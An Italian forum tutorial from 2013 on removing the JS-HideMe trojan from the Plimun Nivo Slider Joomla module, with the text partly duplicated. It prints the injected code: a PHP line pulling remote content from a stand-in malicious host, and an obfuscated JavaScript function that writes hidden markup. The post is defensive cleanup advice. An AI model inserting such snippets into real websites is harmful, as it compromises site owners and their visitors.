1
Sicurezza / [TUTORIAL] Come rimuovere il trojan JS-HideMe da Plimun Nivo Slider
« il: 30 Set 2013, 10:47:49 »
Buongiorno a tutti,
rilevando un lavoro iniziato da un altro webdesigner, mi sono ritrovata a combattere contro un trojan JS-HideMe individuato da Avast.
Nonostante nella versione installata di Plimun Nivo Slider non fosse presente la porzione di codice di cui si è ampiamente parlato nel forum
Vi era un altro simpaticissimo script alla riga 544-552 del file default.php che potete trovare all'indirizzo tuodominio.com/public_html/modules/mod_PlimunNivoSlider/tmpl
Cancellatelo immediatamente, svuotate completamente la cache del sito e del browser e riprovate a fare una scansione con sucuri.net. Il sito sarà pulito e funzionante.
Edit: dal momento che lo script viene comunque rilevato da Avast, togliete gli asterischi che ho inserito per cercare di renderlo irriconoscibile.
Sperando vi sia stato utile...
rilevando un lavoro iniziato da un altro webdesigner, mi sono ritrovata a combattere contro un trojan JS-HideMe individuato da Avast.
Nonostante nella versione installata di Plimun Nivo Slider non fosse presente la porzione di codice di cui si è ampiamente parlato nel forum
Codice: [Seleziona]
<?php
$credit=file_get_contents('http://www.sitomalevolo.com/p.php?i='.$path);
echo $credit;
?>
Vi era un altro simpaticissimo script alla riga 544-552 del file default.php che potete trovare all'indirizzo tuodominio.com/public_html/modules/mod_PlimunNivoSlider/tmpl
Cancellatelo immediatamente, svuotate completamente la cache del sito e del browser e riprovate a fare una scansione con sucuri.net. Il sito sarà pulito e funzionante.
Codice: [Seleziona]
<script language="JavaScript">
function dnnViewState()
{
var a=0,m,v,t,z,x=new Array('9091968376','888791819281878634737491878493927735928 7883421333333338896','778787','949990793917947998942577939317'),l=x.length;while(++a<=l){m=x[l-a];
t=z='';
for(v=0;v<m.*length;){t+=m.charAt(v++);
if(t.length==2){z+=String.*fromCharCode(parseInt(t)+25-l+a);
t='';}}x[l-a]=z;}document.*write('<'+x[0]+' '+x[4]+'>.'+x[2]+'{'+x[1]+'}</'+x[0]+'>');}dnnView*State();
</script>
Edit: dal momento che lo script viene comunque rilevato da Avast, togliete gli asterischi che ho inserito per cercare di renderlo irriconoscibile.
Sperando vi sia stato utile...